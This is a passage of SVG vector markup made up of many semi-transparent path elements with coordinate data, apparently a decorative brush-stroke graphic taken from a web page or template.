d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path 